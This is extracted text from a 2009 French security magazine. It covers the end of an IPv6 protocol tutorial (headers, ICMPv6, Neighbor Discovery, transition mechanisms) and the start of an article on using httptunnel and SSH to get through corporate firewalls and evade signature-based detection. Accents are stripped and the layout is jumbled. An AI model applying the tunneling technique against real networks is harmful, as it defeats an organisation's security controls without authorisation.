Le checksum ou somme de contrle calcul sur lentte nest plus prsent. On considre les rseaux suffisamment fiables pour ne pas avoir besoin de vrifier ce champ dautant plus que dans le cas dIPv4 celui-ci est vrifi et recalcul par chaque routeur prsent le long du chemin. En effet ce checksum inclus le champ TTL (Time To Live) dcrment par chaque routeur lors du transfert du paquet. Ce champ TTL est destin viter quun paquet boucle indfiniment dans le rseau. Ainsi les routeurs rencontrant un paquet avec un champ TTL 0 se doivent de le jeter. Les protocoles de niveau suprieur (niveau transport) auront la charge de vrifier lintgrit des paquets, Les champs relatifs la fragmentation ont t supprims de lentte. En IPv6, es paquets ne sont plus fragments le long du chemin mais sont fragments par la source. La source se doit donc de connatre le Path MTU (Maximum Transmission Unit) ou taille maximum des informations pouvant transiter le long du chemin. Un protocole ddi baptis Path MTU Discovery a donc t soigneusement dfini dans cette optique. Afin de faciliter ce protocole un MTU minimum de 1280 octets est exig sur les diffrents liens utilisant IPv6, Les options et en particulier leur alignement taient assez mal grs en IPv4 rendant ainsi difficile une gestion hardware de celles-ci. Ces problmes ont t corrigs en IPv6. Elles sont maintenant baptises extensions header et sont chanes entre elles de manire plus cohrente. Bien entendu les adresses IPv6 tant 4 fois plus grandes, lentte IPv6 est galement plus grand. Il fait 40 octets pour lentte minimal alors que lentte IPv4 nen fait que 20. On constatera nanmoins que les 2 adresses IPv6 de lentte reprsentent dj 32 octets alors que les 2 adresses IPv4 nen font que 8 (i.e. 24 octets de plus). La Figure 7 vous prsente lentte IPv6 minimal ainsi que lentte IPv4 pour comparaison. La signification des diffrents champs de lentte IPv6 est prcis dans le Tableau 4. routeurs prdfinis lors de lacheminement du paquet. Cet entte contenait ainsi une liste dadresses traverser et lorsque la premire cible indique dans ladresse de destination du paquet tait atteinte, celle-ci changeait son adresse avec la premire adresse de la liste et ainsi de suite jusquau dernier lment de la liste. Le nombre dadresses prsentes pouvant tre relativement important au sein de cette liste, cette option pouvait tre plus facilement utilise en IPv6 pour effectuer des attaques par dni de service en crant des boucles dans ces listes. Cette extension dentte a donc t dprcie. Le Tableau 6 prsente les valeurs utilises dans les champs Next Header prcdent afin de permettre le chanage de ces diffrentes extensions dentte. Ces extensions dentte ont parfois des contraintes dalignement. Dans ces cas-l des sous-options de bourrage sont utilises. La Figure 8 prsente les extensions dentte qui seront explicites par la suite.
Historiquement IPv6 incluait galement un entte baptis Routing Header de type 0, similaire loption Loose Source Routing en IPv4. Cette option permet de traverser des
Fragment Header
Cette extension dentte est utilise pour transfrer un fragment de paquet, le
Tableau 8. Champ de lextension dentte Fragment Header Champs Next Header Reserved Fragment Offset Res M Identification Taille 8 bits 8 bits 13 bits 2 bits 1 bit 32 bits Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Rserv pour une utilisation future. Offset en unit de 8 octets relativement au dbut de la partie fragmentable du paquet originel. Rserv. Positionn 1 sil y a dautres fragments ultrieurs, 0 sinon. Identificateur commun lensemble des fragments.
Tableau 9. Champ de lextension dentte Destination Option Header Champs Next Header Hdr Ext Len Options Taille 8 bits 8 bits Variable Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Longueur de lentte en mot de 8 bits sans prendre en compte les 8 premiers bits. Contient une ou plusieurs sous-options adquates au protocole usit. La taille de ce champ est telle que lextension dentte soit un multiple de 8 octets.
18
HAKIN9 2/2009
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 18
2009-01-05, 18:03
Indique le type de message ICMPv6. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Spcifique au type de message ICMPv6 usit.
ICMPv6
Tableau 11. Champ Type des messages derreur ICMPv6 Messages derreurs Destination Unreachable Packet too Big Time Exceeded Parameter Problem Valeur du champ Type 1 2 3 4
Tableau 12. Champs de lentte ICMPv6 Destination Unreachable Champs Type Code Taille 8 bits 8 bits Rle Vaut 1. Prcise la cause de rejet du paquet : 0 : Pas de route pour la destination, 1 : Interdiction administrative, 2 : Porte de la destination en inadquation avec la source, 3 : Adresse non joignable, 4 : Port non joignable, 5 : Rejet suite la politique ingress/egress de ladresse source, 6 : Rejet suite une politique de route vers la destination. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0.
ICMPv6 (Internet Control Message Protocol) est un protocole de niveau 3 sur le modle en couche TCP/IP, qui permet le contrle des erreurs de transmission. En effet, comme le protocole IPv6 ne gre que le transport des paquets et ne permet pas l'envoi de messages d'erreur, c'est grce ce protocole qu'une machine mettrice peut savoir qu'il y a eu un incident de rseau. ICMPv6 est plus que le pendant dICMP pour IPv4, dans la mesure o il reprend ses spcificits et y ajoute dautres autrefois subdivises dans divers protocoles indpendants. On distingue en particulier : la rsolution dadresse, la dtection dadresse double intgrs auparavant dans ARP (Address Resolution Protocol) pour IPv4. Ces nouveauts seront par la suite dcrites au sein du protocole baptis Neighbor Discovery, la gestion de groupes multicast dfinie auparavant dans IGMP (Internet Group Management Protocol) pour IPv4. Ce mcanisme est prsent nomm MLD (Multicast Listener Discovery),
2/2009 HAKIN9 19
16 bits 32 bits
Variable Contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6.
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 19
2009-01-05, 18:03
DOSSIER
La dcouverte du Path MTU, par le mcanisme Path MTU Discovery. Ces diffrents messages se classifient en 2 catgories : Messages derreur : nots de 0 127 inclus, Messages informationnels : nots de 128 255 inclus. informer lmetteur. La charge utile de ce message contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6 (i.e. 1280 octets). Le rle des diffrents champs est prcis dans le Tableau 13. On pourra se reporter la Figure 11 pour le format de lentte. Le rle des diffrents champs est prcis dans le tableau 14. On pourra se reporter la Figure 11 pour le format de lentte.
Parameter Problem
Ce type de message est gnr par un routeur ne pouvant parser un paquet IPv6 suite une erreur rencontre dans lentte ou dans les enttes dextension. Le rle des diffrents champs est prcis dans le Tableau 15. On pourra se reporter la Figure 11 pour le format de lentte.
Entte ICMPv6
Time Exceeded
Ce type de message est gnr par un routeur lorsque le champ Hop Limit du paquet IPv6 transmettre atteint ou est gal 0. Les paquets IPv6 prsentant une telle spcificit sont jets. Cest en particulier ce type de message qui permet de connatre la route utilise entre 2 points de communication par la commande classique traceroute6. Dans un cadre dutilisation classique de cette commande, lmetteur transmet des paquets IPv6 vers la destination en incrmentant le champ Hop Limit partir de la valeur 1. Le premier routeur recevra donc un tel paquet avec un champ Hop Limit 1, dcrmentera ce champ 0 et gnrera un paquet Time Exceeded vers la source ; le second routeur recevra galement un paquet avec un champ Hop Limit 1, dcrmentera ce champ 0 et gnrera un paquet Time Exceeded vers la source et ainsi de suite jusqu la destination finale.
Lentte commun lensemble des messages ICMPv6 est prsent en Figure 10. Le rle des champs gnriques principaux est indiqu dans le Tableau 10.
Messages informationnels
Les messages dinformation ICMPv6 principaux sont indiqus dans le Tableau 16. Dans ce paragraphe, seuls seront prciss les messages caractre informatif. Ceux relatifs au Neighbor Discovery seront explicits dans le paragraphe associ.
Messages derreurs
Les messages derreurs ICMPv6 sont similaires ceux utiliss en ICMPv4. Ceuxci sont indiqus dans le Tableau 11. Les enttes de ces diffrents messages derreurs sont relativement proches et sont dcrites par la Figure 11.
Destination Unreachable
Un routeur ne pouvant transfrer un paquet pour une quelconque raison telle que par exemple par manque de connaissance sur la route emprunter, par cause doutrepassement de la politique de scurit devrait gnrer un tel message lentit mettrice avant de rejeter le paquet. La charge utile de ce message contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6 (i.e. 1280 octets). En cas de rejet par cause de congestion un routeur ne doit jamais gnrer un tel paquet, il ne ferait quaccentuer la congestion. De la mme manire une entit destinatrice peut gnrer un tel paquet si le protocole de niveau transport ne dispose pas par exemple de serveur en coute sur le port que lmetteur cherche joindre. Le rle des diffrents champs est prcis dans le tableau 12. On pourra se reporter la Figure 11 pour le format de lentte.
Tableau 13. Champs de lentte ICMPv6 Packet Too Big Champs Type Code Checksum MTU Content Taille 8 bits 8 bits 16 bits 32 bits Variable Rle Vaut 2. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Indique le MTU limitatif. Contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6
Tableau 14. Champs de lentte ICMPv6 Time Exceeded Champs Type Code Checksum Unused Content Taille 8 bits 8 bits 16 bits 32 bits Variable Rle Vaut 3. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0. contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 20
2009-01-05, 18:03
On rappelle auparavant que le MTU (Maximum Transmission Unit) est la quantit dinformation maximum pouvant traverser un lien. Le Path MTU est ainsi le MTU minimum du chemin entre la source et la destination. Il a auparavant t prcis quen IPv6 le concept de fragmentation est compltement diffrent tant donn que le cur de rseau na plus cette tche. Si besoin est de transmettre des paquets de taille suprieure au Path MTU, la fragmentation est ralise par linitiateur des paquets. Afin de limiter les problmes de transmission de paquets, IPv6 impose un MTU minimum de 1280 octets. Toutefois cette dfinition du minimum nimpose en aucune faon que les paquets transmis fassent au plus 1280 octets. La dcouverte du Path MTU peut seffectuer laide dun protocole trs
Le protocole de Neighbor Discovery est un protocole indissociable dIPv6. Il a t conu pour faire dIPv6 un protocole plug-and-play. Lide sous-jacente du Neighbor Discovery est de supprimer toute configuration rseau manuelle des interfaces. Il suffit de connecter linterface sur un rseau, pour quautomatiquement, les adresses, la route par dfaut, le MTU soient initialiss. Bien videmment, il ne sagit ici que des machines nayant pas le rle de routeur.
Tableau 15. Champs de lentte ICMPv6 Parameter Problem Champs Type Code Taille 8 bits 8 bits Rle Vaut 4. Prcise la cause du problme rencontr : 0 : Erreur dans un champ de lentte, 1 : Erreur dans le champ Next Header, 2 : Erreur dans une extension dentte. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Pointeur sur loctet responsable de lerreur. Contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum Ipv6.
Tableau 16. Champ Type des messages informationnels ICMPv6 Messages Informationnels Echo Request Echo Reply Group Membership Query Group Membership Report Group Membership Reduction Router Solicitation Router Advertisement Neighbor Solicitation Neighbor Advertisement Redirect Valeur du champ Type 128 129 130 131 132 133 134 135 136 137
2/2009 HAKIN9 21
Neighbor Discovery
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 21
2009-01-05, 18:04
DOSSIER
Ce protocole regroupe les fonctionnalits suivantes : dcouverte des routeurs prsents sur le lien, dcouverte des prfixes du lien, dcouvertes de certains paramtres du lien : MTU , configuration automatique sans tat des adresses Lien-local et globale, rsolution dadresse, dcouverte des routes par dfaut ainsi que des prochains routeurs pour une destination donne, Neighbor Unreachability Detection (NUD) : permet de dterminer quune entit du lien nest plus joignable, Duplicate Address Detection (DAD) : dtection dadresse duplique, mcanisme de redirection. comprenant par exemple un routeur disposant dune connexion point point avec toutes les interfaces prsentes.
Ce protocole nest pas rellement scuris (mme si les spcifications initiales laissent supposer une utilisation potentielle conjointe dIPsec) dans sa version usuelle tant donn quil prend place sur un rseau local principalement. Des extensions telles que SEND (SEcure Neighbor Discovery) utilisant des signatures RSA sont possibles afin damliorer la scurit de celui-ci. Ce protocole a cependant linconvnient de ncessiter un sous-rseau diffusion. Les rseaux NBMA (Non Broadcast Multiple Access) tel qu'ATM ou X25 ncessitent lutilisation dun protocole spcifique
Router Solicitation : une machine place sur un lien envoie spontanment ladresse FFO2 ::1 (tous les routeurs sur le lien) une telle requte afin de disposer des informations ncessaires sa configuration. Lorsque lquipement ne dispose pas encore de son adresse, ce type de requte est mis en utilisant ladresse indtermine (::) en tant que source, Router Advertisement : spontanment un routeur positionn sur un lien envoie intervalles rguliers ce type dannonce afin de permettre aux machines prsentes sur le lien de sautoconfigurer. Ce type de message est galement transmis en rponse une requte Router Solicitation. Dans tous les cas ladresse source utilise est ladresse lien-local du routeur. Selon les cas ladresse destination est ladresse de tous les nuds ou ladresse de la machine ayant effectu la requte.
Comme plusieurs routeurs peuvent mettre ce type dannonce, les machines prsentent sur le lien pourront ainsi disposer de plusieurs routeurs en cas de panne. Ceci permet galement de faire du Multihoming si le site concern a tablit des accords avec plusieurs ISP (Internet Service Provider) ou FAI (Fournisseur d'Accs Internet) en franais. Lentte Router Solicitation est trs proche de celle usite pour les messages
Tableau 17. Champs de lentte ICMPv6 Echo Request/Echo Reply Champs Type Code Checksum Identifier Sequence Number Data Taille 8 bits 8 bits 16 bits 16 bits 16 bits Variable Rle Vaut 128 pour Echo Request, 129 pour Echo Reply. Vaut 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Permet didentifier le couple Echo Request/Echo Reply. Permet didentifier le couple Echo Request/Echo Reply. Donnes ventuelles lidentique dans lEcho Request et lEcho Reply.
Tableau 18. Champs de lentte ICMPv6 Router Solicitation Champs Type Code Checksum Reserved Options Taille 8 bits 8 bits 16 bits 32 bits Variable Rle Vaut 133. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0. Peut contenir par exemple une sous-option Source Link Layer Address indiquant ladresse MAC de lexpditeur.
22
HAKIN9 2/2009
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 22
2009-01-05, 18:04
En IPv4, ces fonctionnalits sont effectues par le protocole ARP (Address Resolution Protocol) ou RARP (Reverse Address Resolution Protocol). Une machine voulant envoyer un paquet une autre (elles peuvent tre toutes deux des routeurs) doit obtenir dans un premier temps son adresse MAC. Elle effectue alors une requte ARP. La rponse associe permet de remplir un cache ARP associant adresses MAC et adresses IP. Chaque entre une dure de vie.
Le Tableau 20 prsente les diffrents champs de lentte Neighbor Solicitation, lentte quant- lui, est prcis dans la Figure 15.
Tableau 19. Champs de lentte ICMPv6 Router Advertisement Champs Type Code Checksum Cur Hop Limit M O Reserved Router Lifetime Reachable Time Retrans Timer Options Taille 8 bits 8 bits 16 bits 8 bits 1 bit 1 bit 6 bits 16 bits 32 bits 32 bits Variable Rle Vaut 134. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Valeur par dfaut que les Machines doivent utiliser pour le champ Hop Limit des paquets gnrs. La valeur 0 indique que ce champ nest pas spcifi par le routeur. Positionn 1 pour indiquer que la configuration dadresse se fait par DHCPv6. Positionn 1 pour indiquer que certains paramtres de configuration supplmentaires sont disponibles via DHCPv6. Ce champ est redondant lorsque le champ M est positionn 1. Positionn 0. Indique la dure de vie (en secondes) de ce routeur en tant que routeur par dfaut. Lorsque ce champ est positionn 0, le routeur ne doit pas tre considr comme le routeur par dfaut. Dure (en millisecondes) pendant laquelle une machine doit considrer quune machine est toujours joignable depuis sa dernire dtection. Temps (en millisecondes) entre 2 retransmissions de messages Neighbor Solicitation. Peut contenir par exemple une sous-option : Source Link Layer Address indiquant ladresse MAC de lexpditeur, MTU indiquant ladresse la taille de MTU usite, Prefix Information indiquant les prfixes rseaux utiliser.
2/2009 HAKIN9 23
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 23
2009-01-05, 18:04
DOSSIER
ladresse indtermine. Si elle ne reoit pas de rponse en retour, cette adresse est considre comme tant unique, et est donc associe linterface. Dans le cas o une rponse, lui parvient, elle ne pourra donc pas utiliser cette adresse, une intervention humaine sera alors indispensable. Il est clair que dans le cas dune panne de lien, au moment de la rparation de ce dernier un conflit dadresse pourra tre dtect. La machine disposant prsent dune adresse Lien-local, il sagit donc pour elle dobtenir une adresse globale routable sur linternet IPv6. Pour cela, elle dispose de deux possibilits : Soit par lintermdiaire dun serveur DHCPv6 (autoconfiguration avec tat), procdure standard en IPv4, Soit par autoconfiguration sans tat ventuellement complte par un serveur DHCPv6. Dans le cas de lautoconfiguration sans tat, linterface cherche acqurir un Router Advertisement (spontanment ou par un Router Solicitation). Ce Routeur Advertisement lui donnera les prfixes rseaux, les routes par dfaut, ventuellement le MTU du lien, les dures de validits de certains timers Elle peut donc ainsi construire laide de son identifiant dinterface, dtermin comme unique, ses diffrentes adresses globales, Dans le cas o le bit O du Router Advertisement est positionn 1, linterface cherchera obtenir des informations complmentaires par DHCPv6 (tel que le DNS par exemple). le processus est achev, elle peut transmettre le paquet linterface en question. Dans le cas contraire, elle met un Neighbor Solicitation pour linterface concerne, Linterface ainsi atteinte rpond par un Neighbor Advertisement afin de renseigner son adresse de niveau liaison de donnes, Lmetteur remplit alors son cache NDP avec le couple (adresse IPv6, adresse MAC) en y ajoutant une dure de validit. Lmetteur peut alors transmettre le paquet en utilisant ladresse MAC correspondante.
Rsolution dadresse
La rsolution dadresse en IPv6 est comme prcise auparavant identique celle dIPv4. Une machine dsireuse denvoyer un paquet une autre (routeur ou non) doit auparavant rsoudre son adresse de niveau liaison de donne. Elle effectue ainsi les tapes suivantes : Vrification de la prsence de ladresse IP dans le cache NDP. Si celle-ci est dj prsente et quelle na pas expire,
HAKIN9 2/2009
L'ensemble des protocoles de niveau rseau ayant t modifi avec IPv6, vient naturellement la question de l'introprabilit avec IPv4; d'autant plus que mme les protocoles de niveau transport (UDP, TCP) et applicatif (DNS, FTP ) se sont adapts pour cette prise en compte de l'augmentation de l'espace d'adressage. Par dfaut les mondes sont ainsi totalement distincts, l'Internet IPv6 tant disjoint de l'Internet IPv4. Cette sparation ayant t value comme l'un des principaux freins au dploiement d'IPv6, l'IETF a originellement mis l'accent sur un certain nombre de mcanismes de transition pour assurer des passerelles entre ces deux mondes. Nanmoins devant le surnombre de propositions, le Working Group de l'IETF ngstrans charg de la standardisation des mcanismes de transition a finalement considr qu'il fallait conserver uniquement quelques mcanismes et promouvoir plutt une migration progressive mais totale des sites en IPv6. Le risque valu tant que les diffrents sites restent en IPv4 et utilisent l'un ou l'autre des mcanismes de transition pour accder aux backbones IPv6. Dans ce paragraphe nous prsenterons succinctement certains des mcanismes de transition les plus usits.
24
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 24
2009-01-05, 18:04
paquet IPv6 vers un botier NAT-PT avec pour destination une adresse spciale IPv6 compose dun prfixe NAT-PT suivi de ladresse IPv4 transforme en hexadcimal. Ce botier a alors la charge de traduire lentte en IPv4, dallouer une adresse IPv4 pour lmetteur, de remplir une table dassociation entre adresse IPv4 alloue et adresse IPv6 de lexpditeur, de rcuprer ladresse IPv4 du destinataire, pour finalement transmettre ce nouveau paquet sur le rseau IPv4 vers la destination. La rponse potentielle suivra le chemin inverse. La table dassociation permettra de retrouver le destinataire effectif de cette rponse. On comprend donc quil est trs difficile de maintenir des serveurs sur le rseau IPv6. Cette table dassociation doit en effet tre statique pour les serveurs potentiels. De plus les informations lies aux adresses et contenues dans les charges utiles devront tre galement modifies par ce type de traducteur. Dautres protocoles doivent par consquent se greffer en plus pour le FTP, le DNS Ce type de protocole a galement du mal conserver la smantique des paquets
Tableau 20. Champs de lentte ICMPv6 Neighbor Solicitation Champs Type Code Checksum Reserved Target Address Options Taille 8 bits 8 bits 16 bits 32 bits Variable Variable Rle Vaut 135. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0. Adresse de la cible sollicite. Ne doit pas tre une adresse Multicast. Peut contenir par exemple une sous-option Source Link Layer Address indiquant ladresse MAC de lexpditeur.
Tableau 21. Champs de lentte ICMPv6 Neighbor Advertisement Champs Type Code Checksum R S O Reserved Target Address Options Taille 8 bits 8 bits 16 bits 1 bit 1 bit 1 bit 29 bits 32 bits Variable Rle Vaut 136. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 1 pour indiquer que lexpditeur est un routeur. Positionn 1 pour indiquer que la rponse lest suite une requte dun message Neighbor Solicitation. Positionn 1 pour indiquer que cette rponse doit mettre jour lentre du cache NDP. Positionn 0. En rponse des Neighbor Solicitation, contient ladresse de lentit ayant effectue cette requte, sinon contient ladresse dont lidentifiant dinterface a chang. Peut contenir par exemple une sous-option Target Link Layer Address indiquant ladresse MAC de lexpditeur de ce message.
2/2009 HAKIN9 25
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 25
2009-01-05, 18:04
DOSSIER
lors de la traduction, se marie trs mal avec les mcanismes de scurit IPsec, la mobilit de machines (MIPv6), la mobilit de rseaux (NEMO), le multicast Devant les nombreux problmes rencontrs, lIETF a donc dcid de ne pas encourager la mise en uvre de ce protocole et la dprci.
Rfrences
Voici quelques rfrences glanes sur Internet : http://standards.ieee.org/regauth/oui/tutorials/EUI64.html Guidelines For 64-Bit Identifier (EUI-64) Registration Authority, http://standards.ieee.org/regauth/oui/oui.txt OUI dfinis par lIEEE, http://www.iana.org/assignments/ipv6-multicast-addresses IPv6 Multicast Adresses, http://www.iana.org/assignments/protocol-numbers/ Protocol Numbers, http://livre.point6.net/index.php IPv6 Thorie et Pratique Gisle Cizault.
Tunneling
Ce type de mcanisme repose principalement sur des besoins de communication de sites ou dlots isols IPv6 (respectivement IPv4) sur une infrastructure IPv4 (respectivement IPv6). Le nombre de mcanismes imagins dans ce contexte foisonne, aucun ntant rellement satisfaisant. 2 techniques diffrentes sopposent ici : les tunnels configurs manuellement ou par un fournisseur public (Tunnel Broker), les tunnels automatiques : 6to4, Teredo, Isatap machine N dun autre rseau 6to4, transmettra donc les paquets IPv6 sa passerelle par routage. Le champ destination indiquera une adresse forme dun prfixe 6to4 incluant ladresse IPv4 de la passerelle de destination. Ce paquet sera ainsi automatiquement encapsul dans un paquet IPv4 avec comme adresse source ladresse de la passerelle mettrice et comme adresse destination celle de rception. La passerelle rceptrice dsencapsulera ce paquet avant de le transmettre sur son lot. Chaque passerelle pointe galement vers un relais par dfaut connect lInternet IPv6. Ce mcanisme simple mettre en uvre a de nombreuses failles de scurit : en particulier il est sensible au dni de service et noffre pas de contrle sur le trafic reu. Une passerelle 6to4 a en effet la possibilit de vrifier la cohrence dadressage entre lentte IPv6 encapsule et lentte IPv4 dans le cas o lmetteur est une passerelle 6to4 mais cette vrification est presque impossible si la source est une adresse native. Dans ce cas-l le paquet sera transmis sur le rseau IPv6 protg par la passerelle, sans certitude quil ne sagit pas dun paquet forg. Le risque est dautant plus important que ladresse IPv4 de lmetteur sera probablement perdue aprs le transfert. IPv4.Il supporte un rseau NBMA (Non Broadcast Multicast Access), gnre des adresses Lien-local depuis les adresses IPv4 et permet lutilisation du protocole Neighbor Discovery au-dessus de cette infrastructure IPv4.
Conclusion
De nombreux mcanismes de transition ont t dfinis pour permettre : la cohabitation des 2 mondes, la communication entre les 2 mondes, la communication entre lots isols IPv6 (respectivement IPv4) dans une infrastructure IPv4 (respectivement IPv6), la communication entre un lot isol IPv6 (respectivement IPv4) et lInternet IPv6 (respectivement IPv4).
Lide nest pas ici de les prsenter tous en dtail, on pourra se reporter aux spcifications au besoin.
Tunnel brokers
Plusieurs fournisseurs proposent ainsi des interfaces WEB permettant aprs inscription la configuration dun tunnel IPv6 sur IPv4 vers le site de lintress. Il suffit donc de configurer manuellement ou par des scripts fournis lautre partie du tunnel jusquau routeur du fournisseur pour accder lInternet IPv6. Cest finalement la mthode la plus approprie pour joindre lInternet IPv6 pour un particulier dont le FAI ne propose pas dIPv6.
6to4
Ce type de mcanisme est principalement usit pour permettre la communication entre lots IPv6 sur une infrastructure IPv4 tout en permettant un accs lInternet IPv6. Le principe est relativement simple : chaque lot isol, qualifi de rseau 6to4 dispose en bordure dune passerelle 6to4 quipe dune double pile. Chaque lot utilise un prfixe particulier qualifi de prfixe 6to4 form de la manire suivante : 2002:: Adresse IPv4 du Relais ::/48 Dans la Figure 20, une machine M dsireuse de communiquer avec une
26 HAKIN9 2/2009
Aucun de ces mcanismes nest pleinement satisfaisant, mais ils nont pas pour vocation d'exister durablement. Ils devraient dcrotre dans le temps en fonction du nombre d'quipements IPv6 prsents sur le rseau. Afin danticiper le passage IPv6, les applications rseaux futures devraient dj prendre en compte ce nouveau mode dadressage et en particulier utiliser les sockets IPv6 qui dans tous les cas permettent la communication avec les 2 mondes. Les anciennes applications doivent galement tre adaptes dans cet esprit. Bien entendu, il sera difficile de faire migrer celles dont on ne dispose plus des sources. Vous trouverez dans le Tableau 23 les rfrences aux normes dcrites au sein de cet article. propos de l'auteur
Frdric Roudaut travaille actuellement chez Orange Labs (anciennement France Telecom R&D) Sophia Antipolis pour le compte dOrange Business Services IT&Labs depuis 1 an et demi. Pour contacter l'auteur : frederic.roudaut@free.fr
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 26
2009-01-05, 18:04
2/2009 HAKIN9
27
14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 27
2009-01-05, 18:05
MICHAEL SCHRATT
Degr de difficult
ans une entreprise, naviguer sur Internet est autoris pour tous les employs. Mais dans ce cas, quentend-t-on par naviguer ? Pour accder au web il faut deux ports ouverts qui autorisent les connexions sortantes. Le port 80 est associ au HTTP et le port 443 est associ au HTTPS (Cf. Tableau 1. portant sur les numros de port importants). Il est plus simple de mener une politique de scurit de l'intrieur vers l'extrieur que l'inverse. Les techniques par canaux cachs sont rpandues et plutt simples prendre en main si on se fie aux nombreux tutoriels sur Internet. Il est clair qu'on ne pourra jamais atteindre une scurit 100%, mais avec certaines mesures on peut s'en rapprocher. Avec les Canaux Cachs, si le trafic est autoris, le protocole employ peut servir de support l'envoie d'informations. Il devient difficile de le dtecter. Dans cet article, je vais vous dmontrer qu'on peut cacher ses traces avec le Tunneling HTTP. Je vous montrerai galement deux outils faciles prendre en main et certaines mesures que vous pourrez mettre en uvre pour prvenir le tunneling. Revenons-en notre exemple, le trafic parat normal. C'est un trafic HTTP/HTTPS. En cas de dtection d'une quelconque anomalie, il se pourrait qu'il y ait des alertes spcifiques. Par exemple, en cas de trafic httptunnel. Que peut-on faire exactement ?
GNU httptunnel
IANA
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 28
2009-01-05, 18:05
Dans le pass on pouvait accder un shell par l'utilisation de telnet. Telnet est aujourd'hui viter pour le transfert de texte. Il est trop inscuris. Il est possible de sniffer le trafic telnet sur un rseau afin d'obtenir conscutivement les noms
Figure 1. Primtre de Scurit du Rseau d'utilisateurs et les mots de passe de diverses personnes. Les versions de Linux sorties aprs Janvier 2002 avaient OpenSSH prinstalles. SSH a remplac telnet et a apport des amliorations au niveau du cryptage du trafic. SSH se nomme galement : Secure Shell. Outre le cryptage du trafic, le SSH permet de scuriser le transfert de vos fichiers et facilite la phase dauthentification. Vous pouvez installer OpenSSH sur un poste Windows tant Tableau 1. Numros de Ports Essentiels Numro de Port 20 21 / TCP 22 / TCP 23 / TCP 25 / TCP 53 / TCP UDP 80 / TCP 110 / TCP 143 / TCP UDP 161 162 / TCP UDP 443 / TCP 1080 / TCP 3128 / TCP 5190 / TCP 6660 6669 / TCP Service FTP SSH Telnet SMTP DNS HTTP POP3 IMAP SNMP HTTPS SOCKS Proxy Squid Proxy ICQ AOL Messenger IRC
2/2009 HAKIN9 29
donn quil existe au format binaire. Il existe un autre client SSH trs connu sous Windows et Unix : Putty. Putty est un outil graphique gratuit comprenant telnet et SSH.
Problme de transfert
Le piratage par canaux cachs est une attaque d'origine interne permettant dtablir des connexions entre des rseaux de confiance vers d'autres non vrifis. Voici diffrents types de techniques : Techniques de Canaux Direct Tunneling ACK Tunneling TCP (telnet, ssh) Tunneling UDP (snmp) Tunneling ICMP
Comme mentionn ci-dessus, en rgle gnrale les ports les plus utiliss pour tablir des connexions sortantes sont : le port 80 (Trafic HTTP non crypt) et le port 443 (Transfert crypt ou HTTPS).
Techniques de Canaux Proxy Tunneling SSL Tunneling HTTPS Tunneling DNS Tunneling FTP Tunneling Mail
L'utilisation des canaux cachs pour le transfert de donnes au sein de votre rseau d'entreprise doit se faire dans un cadre lgal (Cf. Lgalit & Ramifications, pour de plus amples informations).
Avertissement
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 29
2009-01-05, 18:06
PRATIQUE
connecter avec ce tunnel au shell. In fine, on obtient un trafic SSL bas sur un tunnel HTTP avec cryptage, authentification et intgrit des donnes.
Voici le pr-requis techniques avant de se lancer au travail. Pour ct entreprise : Un poste de travail avec accs Internet et au moins un service autoris se connecter l'extrieur, httptunnel au niveau client client SSH.
Ct utilisateur : Poste de travail avec accs Internet, serveur httptunnel correctement configur, Serveur daemon SSH correctement configur (Configuration dcrite sous : Configuration des Services), Avoir pralablement lanc le service auquel vous souhaitez accder distance.
Figure 3. Client SSH Linux Imaginez que l'on veuille accder au port 22 pour faire du SSH sur notre serveur Internet. Avec les restrictions du firewall, on ne peut se connecter directement au port 22 pour ouvrir un shell (invite de commandes).
Vous allez voir comment configurer le serveur httptunnel. La configuration d'un tunnel est relativement simple. Httptunnel est un utilitaire en ligne de commande avec plusieurs fonctions. Selon la configuration dcrite dans la partie Environnement Interne & Externe Ncessaire il y a la possibilit de lancer et configurer directement httptunnel.
Reportez-vous la figure 5. Vous verrez notamment comment le tunneling permet de passer au travers des firewall et des proxies. Vous verrez galement, comment contourner les filtres de protection et les systmes de dtection bass sur les signatures avec un cryptage SSH. Le but : tablir un tunnel HTTP et se
30 HAKIN9 2/2009
28_29_30_31_32_33_34_35_tunneling_breaking_firewall.indd 30
2009-01-05, 18:06
Avec une commande netstat on peut vrifier que la connexion http tunnel est bien tablie. Le port 10001 doit tre en ECOUTE. Lancez ensuite votre client SSH et connectez-vous au port 10001 en local
